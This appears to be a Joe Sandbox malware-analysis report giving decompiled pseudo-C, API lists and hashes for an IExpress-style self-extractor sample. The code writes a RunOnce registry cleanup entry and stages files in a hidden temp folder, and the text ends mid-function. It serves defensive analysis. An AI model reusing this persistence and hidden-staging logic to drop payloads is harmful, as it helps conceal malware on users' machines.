                                                          • Opcode Fuzzy Hash: 0b5bac7735d769212f9305f6a7a479d9a83d13a7671607b75bb117d193ac75ae
                                                          • Instruction Fuzzy Hash: 859002B035110087DB201B71993941575916A4D6827815464A091C9448DB6644406611
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 93%
                                                          			E0109202A(struct HINSTANCE__* __edx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v528;
                                                          				void* _v532;
                                                          				int _v536;
                                                          				int _v540;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t28;
                                                          				long _t36;
                                                          				long _t41;
                                                          				struct HINSTANCE__* _t46;
                                                          				intOrPtr _t49;
                                                          				intOrPtr _t50;
                                                          				CHAR* _t54;
                                                          				void _t56;
                                                          				signed int _t66;
                                                          				intOrPtr* _t72;
                                                          				void* _t73;
                                                          				void* _t75;
                                                          				void* _t80;
                                                          				intOrPtr* _t81;
                                                          				void* _t86;
                                                          				void* _t87;
                                                          				void* _t90;
                                                          				_Unknown_base(*)()* _t91;
                                                          				signed int _t93;
                                                          				void* _t94;
                                                          				void* _t95;
                                                          
                                                          				_t79 = __edx;
                                                          				_t28 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t28 ^ _t93;
                                                          				_t84 = 0x104;
                                                          				memset( &_v268, 0, 0x104);
                                                          				memset( &_v528, 0, 0x104);
                                                          				_t95 = _t94 + 0x18;
                                                          				_t66 = 0;
                                                          				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                          				if(_t36 != 0) {
                                                          					L24:
                                                          					return E01096CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                          				}
                                                          				_push(_t86);
                                                          				_t87 = 0;
                                                          				while(1) {
                                                          					E0109171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                          					_t95 = _t95 + 0x10;
                                                          					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                          					if(_t41 != 0) {
                                                          						break;
                                                          					}
                                                          					_t87 = _t87 + 1;
                                                          					if(_t87 < 0xc8) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				if(_t87 != 0xc8) {
                                                          					GetSystemDirectoryA( &_v528, _t84);
                                                          					_t79 = _t84;
                                                          					E0109658A( &_v528, _t84, "advpack.dll");
                                                          					_t46 = LoadLibraryA( &_v528); // executed
                                                          					_t84 = _t46;
                                                          					if(_t84 == 0) {
                                                          						L10:
                                                          						if(GetModuleFileNameA( *0x1099a3c,  &_v268, 0x104) == 0) {
                                                          							L17:
                                                          							_t36 = RegCloseKey(_v532);
                                                          							L23:
                                                          							_pop(_t86);
                                                          							goto L24;
                                                          						}
                                                          						L11:
                                                          						_t72 =  &_v268;
                                                          						_t80 = _t72 + 1;
                                                          						do {
                                                          							_t49 =  *_t72;
                                                          							_t72 = _t72 + 1;
                                                          						} while (_t49 != 0);
                                                          						_t73 = _t72 - _t80;
                                                          						_t81 = 0x10991e4;
                                                          						do {
                                                          							_t50 =  *_t81;
                                                          							_t81 = _t81 + 1;
                                                          						} while (_t50 != 0);
                                                          						_t84 = _t73 + 0x50 + _t81 - 0x10991e5;
                                                          						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10991e5);
                                                          						if(_t90 != 0) {
                                                          							 *0x1098580 = _t66 ^ 0x00000001;
                                                          							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                          							if(_t66 == 0) {
                                                          								_t54 = "%s /D:%s";
                                                          							}
                                                          							_push("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                          							E0109171E(_t90, _t84, _t54,  &_v268);
                                                          							_t75 = _t90;
                                                          							_t23 = _t75 + 1; // 0x1
                                                          							_t79 = _t23;
                                                          							do {
                                                          								_t56 =  *_t75;
                                                          								_t75 = _t75 + 1;
                                                          							} while (_t56 != 0);
                                                          							_t24 = _t75 - _t79 + 1; // 0x2
                                                          							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                          							RegCloseKey(_v532); // executed
                                                          							_t36 = LocalFree(_t90);
                                                          							goto L23;
                                                          						}
                                                          						_t79 = 0x4b5;
                                                          						E010944B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                          						goto L17;
                                                          					}
                                                          					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                          					_t66 = 0 | _t91 != 0x00000000;
                                                          					FreeLibrary(_t84); // executed
                                                          					if(_t91 == 0) {
                                                          						goto L10;
                                                          					}
                                                          					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                          						E0109658A( &_v268, 0x104, 0x1091140);
                                                          					}
                                                          					goto L11;
                                                          				}
                                                          				_t36 = RegCloseKey(_v532);
                                                          				 *0x1098530 = _t66;
                                                          				goto L23;
                                                          			}


                                                          0x010921d2
                                                          0x010921d9
                                                          0x00000000
                                                          0x010921d9
                                                          0x0109213a
                                                          0x01092141
                                                          0x01092144
                                                          0x0109214c
                                                          0x00000000
                                                          0x00000000
                                                          0x01092163
                                                          0x01092172
                                                          0x01092172
                                                          0x00000000
                                                          0x01092163
                                                          0x010920ea
                                                          0x010920f0
                                                          0x00000000

                                                          APIs
                                                          • memset.MSVCRT ref: 01092050
                                                          • memset.MSVCRT ref: 0109205F
                                                          • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0109208C
                                                            • Part of subcall function 0109171E: _vsnprintf.MSVCRT ref: 01091750
                                                          • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010920C9
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010920EA
                                                          • GetSystemDirectoryA.KERNEL32 ref: 01092103
                                                          • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01092122
                                                          • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 01092134
                                                          • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01092144
                                                          • GetSystemDirectoryA.KERNEL32 ref: 0109215B
                                                          • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0109218C
                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010921C1
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010921E4
                                                          • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0109223D
                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01092249
                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01092250
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                          • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                          • API String ID: 178549006-3073904943
                                                          • Opcode ID: c1aee6cb3cff18512ef44d2292213b8833d1a1af5ca9d18ed95a5df1f0c280f0
                                                          • Instruction ID: 8075c06a09dbd929f7282c6d0e6b94a729580edfb6b03efc441a584d2cc461b9
                                                          • Opcode Fuzzy Hash: c1aee6cb3cff18512ef44d2292213b8833d1a1af5ca9d18ed95a5df1f0c280f0
                                                          • Instruction Fuzzy Hash: CA5124B5A00218BBDF309B64DC68FFA7B6CFB91700F0041E9BAC9E7145DA7699489B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 232 10955a0-10955d9 call 109468f LocalAlloc 235 10955db-10955f1 call 10944b9 call 1096285 232->235 236 10955fd-109560c call 109468f 232->236 248 10955f6-10955f8 235->248 242 109560e-1095630 call 10944b9 LocalFree 236->242 243 1095632-1095643 lstrcmpA 236->243 242->248 246 109564b-1095659 LocalFree 243->246 247 1095645 243->247 250 109565b-109565d 246->250 251 1095696-109569c 246->251 247->246 252 10958b7-10958c7 call 1096ce0 248->252 255 1095669 250->255 256 109565f-1095667 250->256 253 109589f-10958b5 call 1096517 251->253 254 10956a2-10956a8 251->254 253->252 254->253 260 10956ae-10956c1 GetTempPathA 254->260 257 109566b-109567a call 1095467 255->257 256->255 256->257 269 109589b-109589d 257->269 270 1095680-1095691 call 10944b9 257->270 264 10956f3-1095711 call 1091781 260->264 265 10956c3-10956c9 call 1095467 260->265 274 109586c-1095890 GetWindowsDirectoryA call 109597d 264->274 275 1095717-1095729 GetDriveTypeA 264->275 272 10956ce-10956d0 265->272 269->252 270->248 272->269 276 10956d6-10956df call 1092630 272->276 274->264 289 1095896 274->289 278 109572b-109572e 275->278 279 1095730-1095740 GetFileAttributesA 275->279 276->264 290 10956e1-10956ed call 1095467 276->290 278->279 282 1095742-1095745 278->282 279->282 283 109577e-109578f call 109597d 279->283 287 109576b 282->287 288 1095747-109574f 282->288 297 1095791-109579e call 1092630 283->297 298 10957b2-10957bf call 1092630 283->298 291 1095771-1095779 287->291 288->291 294 1095751-1095753 288->294 289->269 290->264 290->269 295 1095864-1095866 291->295 294->291 299 1095755-1095762 call 1096952 294->299 295->274 295->275 297->287 306 10957a0-10957b0 call 109597d 297->306 307 10957c1-10957cd GetWindowsDirectoryA 298->307 308 10957d3-10957f8 call 109658a GetFileAttributesA 298->308 299->287 309 1095764-1095769 299->309 306->287 306->298 307->308 314 109580a 308->314 315 10957fa-1095808 CreateDirectoryA 308->315 309->283 309->287 
316 109580d-109580f 314->316 315->316 317 1095811-1095825 316->317 318 1095827-109585c SetFileAttributesA call 1091781 call 1095467 316->318 317->295 318->269 323 109585e 318->323 323->295
                                                          C-Code - Quality: 92%
                                                          			E010955A0(void* __eflags) {
                                                          				signed int _v8;
                                                          				char _v265;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t28;
                                                          				int _t32;
                                                          				int _t33;
                                                          				int _t35;
                                                          				signed int _t36;
                                                          				signed int _t38;
                                                          				int _t40;
                                                          				int _t44;
                                                          				long _t48;
                                                          				int _t49;
                                                          				int _t50;
                                                          				signed int _t53;
                                                          				int _t54;
                                                          				int _t59;
                                                          				char _t60;
                                                          				int _t65;
                                                          				char _t66;
                                                          				int _t67;
                                                          				int _t68;
                                                          				int _t69;
                                                          				int _t70;
                                                          				int _t71;
                                                          				struct _SECURITY_ATTRIBUTES* _t72;
                                                          				int _t73;
                                                          				CHAR* _t82;
                                                          				CHAR* _t88;
                                                          				void* _t103;
                                                          				signed int _t110;
                                                          
                                                          				_t28 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t28 ^ _t110;
                                                          				_t2 = E0109468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                          				_t109 = LocalAlloc(0x40, _t2);
                                                          				if(_t109 != 0) {
                                                          					_t82 = "RUNPROGRAM";
                                                          					_t32 = E0109468F(_t82, _t109, 1);
                                                          					__eflags = _t32;
                                                          					if(_t32 != 0) {
                                                          						_t33 = lstrcmpA(_t109, "<None>");
                                                          						__eflags = _t33;
                                                          						if(_t33 == 0) {
                                                          							 *0x1099a30 = 1;
                                                          						}
                                                          						LocalFree(_t109);
                                                          						_t35 =  *0x1098b3e; // 0x0
                                                          						__eflags = _t35;
                                                          						if(_t35 == 0) {
                                                          							__eflags =  *0x1098a24; // 0x0
                                                          							if(__eflags != 0) {
                                                          								L46:
                                                          								_t101 = 0x7d2;
                                                          								_t36 = E01096517(_t82, 0x7d2, 0, E01093210, 0, 0);
                                                          								asm("sbb eax, eax");
                                                          								_t38 =  ~( ~_t36);
                                                          							} else {
                                                          								__eflags =  *0x1099a30; // 0x0
                                                          								if(__eflags != 0) {
                                                          									goto L46;
                                                          								} else {
                                                          									_t109 = 0x10991e4;
                                                          									_t40 = GetTempPathA(0x104, 0x10991e4);
                                                          									__eflags = _t40;
                                                          									if(_t40 == 0) {
                                                          										L19:
                                                          										_push(_t82);
                                                          										E01091781( &_v268, 0x104, _t82, "A:\\");
                                                          										__eflags = _v268 - 0x5a;
                                                          										if(_v268 <= 0x5a) {
                                                          											do {
                                                          												_t109 = GetDriveTypeA( &_v268);
                                                          												__eflags = _t109 - 6;
                                                          												if(_t109 == 6) {
                                                          													L22:
                                                          													_t48 = GetFileAttributesA( &_v268);
                                                          													__eflags = _t48 - 0xffffffff;
                                                          													if(_t48 != 0xffffffff) {
                                                          														goto L30;
                                                          													} else {
                                                          														goto L23;
                                                          													}
                                                          												} else {
                                                          													__eflags = _t109 - 3;
                                                          													if(_t109 != 3) {
                                                          														L23:
                                                          														__eflags = _t109 - 2;
                                                          														if(_t109 != 2) {
                                                          															L28:
                                                          															_t66 = _v268;
                                                          															goto L29;
                                                          														} else {
                                                          															_t66 = _v268;
                                                          															__eflags = _t66 - 0x41;
                                                          															if(_t66 == 0x41) {
                                                          																L29:
                                                          																_t60 = _t66 + 1;
                                                          																_v268 = _t60;
                                                          																goto L42;
                                                          															} else {
                                                          																__eflags = _t66 - 0x42;
                                                          																if(_t66 == 0x42) {
                                                          																	goto L29;
                                                          																} else {
                                                          																	_t68 = E01096952( &_v268);
                                                          																	__eflags = _t68;
                                                          																	if(_t68 == 0) {
                                                          																		goto L28;
                                                          																	} else {
                                                          																		__eflags = _t68 - 0x19000;
                                                          																		if(_t68 >= 0x19000) {
                                                          																			L30:
                                                          																			_push(0);
                                                          																			_t103 = 3;
                                                          																			_t49 = E0109597D( &_v268, _t103, 1);
                                                          																			__eflags = _t49;
                                                          																			if(_t49 != 0) {
                                                          																				L33:
                                                          																				_t50 = E01092630(0,  &_v268, 1);
                                                          																				__eflags = _t50;
                                                          																				if(_t50 != 0) {
                                                          																					GetWindowsDirectoryA( &_v268, 0x104);
                                                          																				}
                                                          																				_t88 =  &_v268;
                                                          																				E0109658A(_t88, 0x104, "msdownld.tmp");
                                                          																				_t53 = GetFileAttributesA( &_v268);
                                                          																				__eflags = _t53 - 0xffffffff;
                                                          																				if(_t53 != 0xffffffff) {
                                                          																					_t54 = _t53 & 0x00000010;
                                                          																					__eflags = _t54;
                                                          																				} else {
                                                          																					_t54 = CreateDirectoryA( &_v268, 0);
                                                          																				}
                                                          																				__eflags = _t54;
                                                          																				if(_t54 != 0) {
                                                          																					SetFileAttributesA( &_v268, 2);
                                                          																					_push(_t88);
                                                          																					_t109 = 0x10991e4;
                                                          																					E01091781(0x10991e4, 0x104, _t88,  &_v268);
                                                          																					_t101 = 1;
                                                          																					_t59 = E01095467(0x10991e4, 1, 0);
                                                          																					__eflags = _t59;
                                                          																					if(_t59 != 0) {
                                                          																						goto L45;
                                                          																					} else {
                                                          																						_t60 = _v268;
                                                          																						goto L42;
                                                          																					}
                                                          																				} else {
                                                          																					_t60 = _v268 + 1;
                                                          																					_v265 = 0;
                                                          																					_v268 = _t60;
                                                          																					goto L42;
                                                          																				}
                                                          																			} else {
                                                          																				_t65 = E01092630(0,  &_v268, 1);
                                                          																				__eflags = _t65;
                                                          																				if(_t65 != 0) {
                                                          																					goto L28;
                                                          																				} else {
                                                          																					_t67 = E0109597D( &_v268, 1, 1, 0);
                                                          																					__eflags = _t67;
                                                          																					if(_t67 == 0) {
                                                          																						goto L28;
                                                          																					} else {
                                                          																						goto L33;
                                                          																					}
                                                          																				}
                                                          																			}
                                                          																		} else {
                                                          																			goto L28;
                                                          																		}
                                                          																	}
                                                          																}
                                                          															}
                                                          														}
                                                          													} else {
                                                          														goto L22;
                                                          													}
                                                          												}
                                                          												goto L47;
                                                          												L42:
                                                          												__eflags = _t60 - 0x5a;
                                                          											} while (_t60 <= 0x5a);
                                                          										}
                                                          										goto L43;
                                                          									} else {
                                                          										_t101 = 1;
                                                          										_t69 = E01095467(0x10991e4, 1, 3); // executed
                                                          										__eflags = _t69;
                                                          										if(_t69 != 0) {
                                                          											goto L45;
                                                          										} else {
                                                          											_t82 = 0x10991e4;
                                                          											_t70 = E01092630(0, 0x10991e4, 1);
                                                          											__eflags = _t70;
                                                          											if(_t70 != 0) {
                                                          												goto L19;
                                                          											} else {
                                                          												_t101 = 1;
                                                          												_t82 = 0x10991e4;
                                                          												_t71 = E01095467(0x10991e4, 1, 1);
                                                          												__eflags = _t71;
                                                          												if(_t71 != 0) {
                                                          													goto L45;
                                                          												} else {
                                                          													do {
                                                          														goto L19;
                                                          														L43:
                                                          														GetWindowsDirectoryA( &_v268, 0x104);
                                                          														_push(4);
                                                          														_t101 = 3;
                                                          														_t82 =  &_v268;
                                                          														_t44 = E0109597D(_t82, _t101, 1);
                                                          														__eflags = _t44;
                                                          													} while (_t44 != 0);
                                                          													goto L2;
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						} else {
                                                          							__eflags = _t35 - 0x5c;
                                                          							if(_t35 != 0x5c) {
                                                          								L10:
                                                          								_t72 = 1;
                                                          							} else {
                                                          								__eflags =  *0x1098b3f - _t35; // 0x0
                                                          								_t72 = 0;
                                                          								if(__eflags != 0) {
                                                          									goto L10;
                                                          								}
                                                          							}
                                                          							_t101 = 0;
                                                          							_t73 = E01095467(0x1098b3e, 0, _t72);
                                                          							__eflags = _t73;
                                                          							if(_t73 != 0) {
                                                          								L45:
                                                          								_t38 = 1;
                                                          							} else {
                                                          								_t101 = 0x4be;
                                                          								E010944B9(0, 0x4be, 0, 0, 0x10, 0);
                                                          								goto L2;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t101 = 0x4b1;
                                                          						E010944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          						LocalFree(_t109);
                                                          						 *0x1099124 = 0x80070714;
                                                          						goto L2;
                                                          					}
                                                          				} else {
                                                          					_t101 = 0x4b5;
                                                          					E010944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          					 *0x1099124 = E01096285();
                                                          					L2:
                                                          					_t38 = 0;
                                                          				}
                                                          				L47:
                                                          				return E01096CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010955CF
                                                          • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 01095638
                                                          • LocalFree.KERNEL32(00000000), ref: 0109564C
                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 01095620
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                            • Part of subcall function 01096285: GetLastError.KERNEL32(01095BBC), ref: 01096285
                                                          • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010956B9
                                                          • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0109571E
                                                          • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 01095737
                                                          • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010957CD
                                                          • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010957EF
                                                          • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 01095802
                                                            • Part of subcall function 01092630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 01092654
                                                          • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 01095830
                                                            • Part of subcall function 01096517: FindResourceA.KERNEL32(01090000,000007D6,00000005), ref: 0109652A
                                                            • Part of subcall function 01096517: LoadResource.KERNEL32(01090000,00000000,?,?,01092EE8,00000000,010919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01096538
                                                            • Part of subcall function 01096517: DialogBoxIndirectParamA.USER32(01090000,00000000,00000547,010919E0,00000000), ref: 01096557
                                                            • Part of subcall function 01096517: FreeResource.KERNEL32(00000000,?,?,01092EE8,00000000,010919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01096560
                                                          • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 01095878
                                                            • Part of subcall function 0109597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010959A8
                                                            • Part of subcall function 0109597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010959AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                          • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                          • API String ID: 2436801531-3498133043
                                                          • Opcode ID: e97da9fc17e086abd7e4764750c80d5d0ae04eb8b9f4472d85e88ceccebc0590
                                                          • Instruction ID: 21f664532f98582ecfb554b75907807023f811c8017cc8210043db99691d581e
                                                          • Opcode Fuzzy Hash: e97da9fc17e086abd7e4764750c80d5d0ae04eb8b9f4472d85e88ceccebc0590
                                                          • Instruction Fuzzy Hash: FE812870B042059ADF63AA7A9C74BFF76ADBB55300F0400E7E5C6E7181DE748E81AB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 324 109597d-10959b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 10959bb-10959d8 call 10944b9 call 1096285 324->325 326 10959dd-1095a1b GetDiskFreeSpaceA 324->326 343 1095c05-1095c14 call 1096ce0 325->343 328 1095ba1-1095bde memset call 1096285 GetLastError FormatMessageA 326->328 329 1095a21-1095a4a MulDiv 326->329 339 1095be3-1095bfc call 10944b9 SetCurrentDirectoryA 328->339 329->328 332 1095a50-1095a6c GetVolumeInformationA 329->332 335 1095a6e-1095ab0 memset call 1096285 GetLastError FormatMessageA 332->335 336 1095ab5-1095aca SetCurrentDirectoryA 332->336 335->339 337 1095acc-1095ad1 336->337 341 1095ad3-1095ad8 337->341 342 1095ae2-1095ae4 337->342 351 1095c02 339->351 341->342 346 1095ada-1095ae0 341->346 348 1095ae7-1095af8 342->348 349 1095ae6 342->349 346->337 346->342 353 1095af9-1095afb 348->353 349->348 354 1095c04 351->354 355 1095afd-1095b03 353->355 356 1095b05-1095b08 353->356 354->343 355->353 355->356 357 1095b0a-1095b1b call 10944b9 356->357 358 1095b20-1095b27 356->358 357->351 360 1095b29-1095b33 358->360 361 1095b52-1095b5b 358->361 360->361 364 1095b35-1095b50 360->364 362 1095b62-1095b6d 361->362 365 1095b6f-1095b74 362->365 366 1095b76-1095b7d 362->366 364->362 367 1095b85 365->367 368 1095b7f-1095b81 366->368 369 1095b83 366->369 370 1095b87-1095b94 call 109268b 367->370 371 1095b96-1095b9f 367->371 368->367 369->367 370->354 371->354
                                                          C-Code - Quality: 96%
                                                          			E0109597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                          				signed int _v8;
                                                          				char _v16;
                                                          				char _v276;
                                                          				char _v788;
                                                          				long _v792;
                                                          				long _v796;
                                                          				long _v800;
                                                          				signed int _v804;
                                                          				long _v808;
                                                          				int _v812;
                                                          				long _v816;
                                                          				long _v820;
                                                          				void* __ebx;
                                                          				void* __esi;
                                                          				signed int _t46;
                                                          				int _t50;
                                                          				signed int _t55;
                                                          				void* _t66;
                                                          				int _t69;
                                                          				signed int _t73;
                                                          				signed short _t78;
                                                          				signed int _t87;
                                                          				signed int _t101;
                                                          				int _t102;
                                                          				unsigned int _t103;
                                                          				unsigned int _t105;
                                                          				signed int _t111;
                                                          				long _t112;
                                                          				signed int _t116;
                                                          				CHAR* _t118;
                                                          				signed int _t119;
                                                          				signed int _t120;
                                                          
                                                          				_t114 = __edi;
                                                          				_t46 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t46 ^ _t120;
                                                          				_v804 = __edx;
                                                          				_t118 = __ecx;
                                                          				GetCurrentDirectoryA(0x104,  &_v276);
                                                          				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                          				if(_t50 != 0) {
                                                          					_push(__edi);
                                                          					_v796 = 0;
                                                          					_v792 = 0;
                                                          					_v800 = 0;
                                                          					_v808 = 0;
                                                          					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                          					__eflags = _t55;
                                                          					if(_t55 == 0) {
                                                          						L29:
                                                          						memset( &_v788, 0, 0x200);
                                                          						 *0x1099124 = E01096285();
                                                          						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                          						_t110 = 0x4b0;
                                                          						L30:
                                                          						__eflags = 0;
                                                          						E010944B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                          						SetCurrentDirectoryA( &_v276);
                                                          						L31:
                                                          						_t66 = 0;
                                                          						__eflags = 0;
                                                          						L32:
                                                          						_pop(_t114);
                                                          						goto L33;
                                                          					}
                                                          					_t69 = _v792 * _v796;
                                                          					_v812 = _t69;
                                                          					_t116 = MulDiv(_t69, _v800, 0x400);
                                                          					__eflags = _t116;
                                                          					if(_t116 == 0) {
                                                          						goto L29;
                                                          					}
                                                          					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                          					__eflags = _t73;
                                                          					if(_t73 != 0) {
                                                          						SetCurrentDirectoryA( &_v276); // executed
                                                          						_t101 =  &_v16;
                                                          						_t111 = 6;
                                                          						_t119 = _t118 - _t101;
                                                          						__eflags = _t119;
                                                          						while(1) {
                                                          							_t22 = _t111 - 4; // 0x2
                                                          							__eflags = _t22;
                                                          							if(_t22 == 0) {
                                                          								break;
                                                          							}
                                                          							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                          							__eflags = _t87;
                                                          							if(_t87 == 0) {
                                                          								break;
                                                          							}
                                                          							 *_t101 = _t87;
                                                          							_t101 = _t101 + 1;
                                                          							_t111 = _t111 - 1;
                                                          							__eflags = _t111;
                                                          							if(_t111 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						__eflags = _t111;
                                                          						if(_t111 == 0) {
                                                          							_t101 = _t101 - 1;
                                                          							__eflags = _t101;
                                                          						}
                                                          						 *_t101 = 0;
                                                          						_t112 = 0x200;
                                                          						_t102 = _v812;
                                                          						_t78 = 0;
                                                          						_t118 = 8;
                                                          						while(1) {
                                                          							__eflags = _t102 - _t112;
                                                          							if(_t102 == _t112) {
                                                          								break;
                                                          							}
                                                          							_t112 = _t112 + _t112;
                                                          							_t78 = _t78 + 1;
                                                          							__eflags = _t78 - _t118;
